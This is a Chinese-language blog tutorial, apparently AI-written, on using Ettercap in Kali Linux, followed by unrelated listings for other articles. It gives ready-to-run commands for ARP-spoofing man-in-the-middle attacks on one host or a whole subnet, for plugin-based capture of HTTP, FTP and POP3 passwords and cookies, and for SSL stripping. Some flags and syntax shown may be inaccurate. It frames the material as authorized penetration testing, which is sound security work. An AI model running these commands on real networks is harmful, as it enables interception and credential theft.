news 2026/1/15 8:42:19

Ettercap 的高效使用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Ettercap 的高效使用

Ettercap 的高效使用核心在于明确攻击场景+选对模式 / 插件+提前解决配置问题(比如你刚才遇到的 SSL 解析、IPv6 临时地址问题)。作为白帽子,我们主要用它做中间人攻击(MITM)流量嗅探密码捕获ARP 欺骗等合法渗透测试操作。

下面按常用场景给你分步讲解高效用法,每个场景都带直接可用的命令核心参数注意事项,全程贴合 Kali Linux 环境和白帽子测试规范。


前提:先解决启动时的两个关键问题

在高效使用前,必须先修复你刚才输出中的两个警告,否则核心功能(如 SSL 解密)会失效:

1. 修复 SSL 解析功能(关键:支持 HTTPS 流量捕获)

编辑 ettercap 主配置文件:

bash

运行

vim /etc/ettercap/etter.conf
步骤 1:找到redir_command_on配置块

根据你的系统(Kali 是 Linux),取消对应行的注释(删除行首的#),修改后如下:

conf

# Redir command for Linux redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
步骤 2:保存退出后,重启 ettercap 即可生效

2. 禁用 IPv6 临时地址(避免干扰嗅探)

临时禁用(本次会话有效):

bash

运行

echo 0 > /proc/sys/net/ipv6/conf/eth0/use_tempaddr

永久禁用(重启后生效):

bash

运行

echo "net.ipv6.conf.eth0.use_tempaddr = 0" >> /etc/sysctl.conf sysctl -p

场景 1:最常用 - ARP 欺骗中间人攻击(核心功能)

ARP 欺骗是 Ettercap 最经典的用法,原理是向目标主机和网关发送伪造的 ARP 包,让自己成为两者之间的 “中间人”,从而捕获双向流量。

核心命令(分 3 种情况)

情况 1:欺骗单个目标主机(目标 IP + 网关 IP)

bash

运行

ettercap -Tq -i eth0 -M arp:remote /目标IP/ /网关IP/

示例:欺骗 192.168.1.100(目标主机)和 192.168.1.1(网关):

bash

运行

ettercap -Tq -i eth0 -M arp:remote /192.168.1.100/ /192.168.1.1/
情况 2:欺骗整个子网(所有主机 + 网关)

bash

运行

ettercap -Tq -i eth0 -M arp:remote /网关IP/ /255.255.255.0/

示例:欺骗 192.168.1.0/24 子网所有主机和网关 192.168.1.1:

bash

运行

ettercap -Tq -i eth0 -M arp:remote /192.168.1.1/ /255.255.255.0/
情况 3:双向欺骗(目标 A ↔ 目标 B)

bash

运行

ettercap -Tq -i eth0 -M arp:remote /目标AIP/ /目标BIP/

核心参数说明

  • -M arp:remote:启用 ARP 欺骗模式,remote表示双向欺骗(目标 ↔ 网关),如果用local则是单向欺骗。
  • /IP/:必须用斜杠包裹 IP 地址,这是 Ettercap 的语法要求。

高效技巧

  1. 先扫描子网存活主机:用ettercap -Tq -i eth0先扫描(如你刚才的操作),获取目标 IP 和网关 IP。
  2. 配合流量保存:加-w 流量文件.pcap参数,将捕获的流量保存为 pcap 文件,后续用 Wireshark 分析:

    bash

    运行

    ettercap -Tq -i eth0 -M arp:remote /192.168.1.100/ /192.168.1.1/ -w mitm_traffic.pcap
  3. 停止欺骗:按Ctrl+C后,Ettercap 会自动发送恢复 ARP 表的包(关键!避免测试后目标主机断网)。

场景 2:密码捕获(明文 / 弱加密协议)

Ettercap 内置了大量密码捕获插件,可以自动解析 HTTP、FTP、Telnet、POP3 等明文协议的账号密码,甚至支持部分弱加密协议(如 IMAP)。

核心用法:ARP 欺骗 + 加载密码插件

步骤 1:启动 ARP 欺骗并加载插件

bash

运行

ettercap -Tq -i eth0 -M arp:remote /目标IP/ /网关IP/ -P 插件名
常用插件(直接替换插件名
插件名功能支持协议
pop3捕获 POP3 邮箱密码POP3(110 端口)
ftp捕获 FTP 服务器密码FTP(21 端口)
telnet捕获 Telnet 登录密码Telnet(23 端口)
http_cookie捕获 HTTP CookieHTTP(80 端口)
http_passwd捕获 HTTP 表单密码(POST)HTTP(80 端口)
msn捕获 MSN 聊天密码MSN 协议
示例:捕获目标主机的 HTTP 表单密码和 FTP 密码

bash

运行

# 同时加载多个插件,用逗号分隔 ettercap -Tq -i eth0 -M arp:remote /192.168.1.100/ /192.168.1.1/ -P http_passwd,ftp

高效技巧

  1. 优先用http_passwd插件:Web 表单密码是最常见的测试目标,该插件会自动解析 POST 请求中的账号密码。
  2. 查看捕获结果:在终端中实时输出,同时会保存到/root/.ettercap/logs/目录下的日志文件。

场景 3:SSL/TLS 流量解密(HTTPS 协议)

修复了redir_command_on配置后,就可以用 Ettercap 进行SSL 中间人攻击,解密 HTTPS 流量(原理是伪造证书,需要目标主机信任伪造的证书,测试环境下可手动信任)。

核心命令

bash

运行

ettercap -Tq -i eth0 -M arp:remote /目标IP/ /网关IP/ --ssl-strip

关键参数

  • --ssl-strip:启用 SSL 剥离功能,将 HTTPS 请求强制转换为 HTTP 请求,从而捕获明文流量。

注意事项

  1. 该方法对现代浏览器(如 Chrome、Firefox)效果有限,因为浏览器会检测证书伪造(显示 “不安全连接”)。
  2. 测试环境下:可在目标主机上手动信任 Ettercap 生成的根证书(路径:/etc/ettercap/certs/ettercap-ca.crt)。
  3. 替代方案:使用sslstrip工具(Kali 内置)配合 Ettercap,效果更好。

场景 4:被动嗅探(不主动欺骗,仅捕获流量)

如果不需要中间人攻击,仅需被动捕获子网内的广播流量或流经本机的流量,可用被动嗅探模式(就是你最初执行的命令,加上一些优化参数)。

核心命令

bash

运行

# 被动嗅探 + 保存流量 + 只捕获 TCP 流量 ettercap -Tq -i eth0 -w passive_traffic.pcap -f tcp

关键参数

  • -f 过滤规则:按协议过滤流量,支持tcpudpicmp等,减少无用流量。
  • -w 文件名:保存流量到 pcap 文件,后续用 Wireshark 分析。

高效使用的通用技巧

  1. 熟悉纯文本界面命令:启动后按h查看帮助,常用命令:
    • p:加载 / 卸载插件
    • s:扫描子网主机
    • q:退出工具(自动恢复 ARP 表)
  2. 配合 Wireshark 分析流量:Ettercap 擅长捕获和欺骗,Wireshark 擅长深度分析,将 Ettercap 保存的 pcap 文件导入 Wireshark,能高效定位关键流量。
  3. 测试前确认网络拓扑:确保你的 Kali 主机和目标主机在同一子网(ARP 欺骗仅在同一广播域内有效)。
  4. 使用安静模式 + 日志保存-q参数减少冗余输出,同时用-l 日志文件参数保存详细日志,方便后续复盘。
  5. 避免误操作:测试完成后必须按Ctrl+C正常退出,让 Ettercap 发送 ARP 恢复包,否则目标主机会一直无法访问网关。

白帽子重要提醒

  1. 仅在授权环境下使用:ARP 欺骗、流量嗅探等操作属于网络攻击行为,必须获得目标网络或主机的书面授权,否则涉嫌违法。
  2. 测试环境建议:用自己的服务器(如你拥有的服务器)和虚拟机搭建测试环境(Kali + Windows 虚拟机 + 路由器),全程在自己的网络内操作。
  3. 遵守法律法规:《网络安全法》《刑法》等法律对网络攻击行为有明确处罚规定,白帽子的核心是合法测试,保护网络安全

下一步高效操作建议

  1. 先在你的测试环境中(如 Kali 虚拟机 + 另一台虚拟机)执行ARP 欺骗 + http_passwd 插件命令,验证密码捕获功能。
  2. 尝试将捕获的 pcap 流量文件导入 Wireshark,分析其中的 HTTP 表单数据。
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/1/15 5:13:00

HeyGem系统未来 roadmap 规划曝光令人期待

HeyGem系统未来 roadmap 规划曝光令人期待 在教育机构为同一课程准备男女双讲师版本时,传统流程需要分别拍摄、配音、剪辑,耗时又费力。而现在,只需一段音频和两位老师的静态视频,一个名为 HeyGem 的AI工具就能自动完成口型同步&a…

作者头像 李华
网站建设 2026/1/12 23:00:01

基于springboot + vue小区物业管理系统(源码+数据库+文档)

小区物业管理 目录 基于springboot vue小区物业管理系统 一、前言 二、系统功能演示 三、技术选型 四、其他项目参考 五、代码参考 六、测试参考 七、最新计算机毕设选题推荐 八、源码获取: 基于springboot vue小区物业管理系统 一、前言 博主介绍&…

作者头像 李华
网站建设 2026/1/12 15:16:22

基于java + vue大学志愿填报系统(源码+数据库+文档)

大学志愿填报系统 目录 基于springboot vue校车管理信息系统 一、前言 二、系统功能演示 三、技术选型 四、其他项目参考 五、代码参考 六、测试参考 七、最新计算机毕设选题推荐 八、源码获取: 基于springboot vue大学志愿填报系统 一、前言 博主介绍&…

作者头像 李华
网站建设 2026/1/11 14:58:42

基于java + vue加油站管理系统(源码+数据库+文档)

加油站管理系统 目录 基于springboot vue加油站管理系统 一、前言 二、系统功能演示 三、技术选型 四、其他项目参考 五、代码参考 六、测试参考 七、最新计算机毕设选题推荐 八、源码获取: 基于springboot vue加油站管理系统 一、前言 博主介绍&#x…

作者头像 李华
网站建设 2026/1/11 23:15:48

树莓派更换静态IP项目应用:远程访问优化

树莓派远程访问不掉线的秘密:静态IP配置实战指南你有没有遇到过这种情况:刚在公司用SSH连上家里的树莓派,正准备调试脚本,结果一重启设备,再连却发现“Connection refused”?查了半天才发现——IP地址变了&…

作者头像 李华
网站建设 2026/1/9 6:36:10

教育机构如何利用HeyGem制作AI教师讲课视频?

教育机构如何利用HeyGem制作AI教师讲课视频? 在今天的在线教育战场上,一个现实问题正困扰着众多教学团队:课程更新越来越快,学生需求日益个性化,但每录一节高质量教学视频,仍要协调教师时间、布置拍摄环境、…

作者头像 李华